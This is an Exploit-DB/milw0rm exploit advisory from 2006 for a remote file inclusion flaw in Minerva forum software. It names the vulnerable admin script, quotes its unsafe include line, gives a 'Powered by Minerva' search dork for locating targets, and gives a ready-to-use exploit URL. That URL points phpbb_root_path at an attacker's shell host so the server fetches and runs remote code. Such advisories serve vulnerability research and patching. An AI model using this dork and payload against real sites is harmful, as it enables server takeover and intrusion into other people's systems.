Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion

EDB-ID:

2429


Author:

SHiKaA

Type:

webapps


Platform:

PHP

Date:

2006-09-25


#==============================================================================================
#Minerva <= v238 (phpbb_root_path) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download      
#                                                                      
#Version : All Versions                                            
#                                                        
#================================================================================================
#
#Dork : "Powered by Minerva"
#
#================================================================================================
#Bug in : admin/admin_topic_action_logging.php
#
#Vlu Code :
#--------------------------------
#
# if ( !empty($setmodules) )
#{
#    include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_topic_action_logging.' . $phpEx);
#    $module['Forums']['Action_Logging'] = basename(__FILE__);
#    return;
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & HACKERS PAL & XoRon & Simoo & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]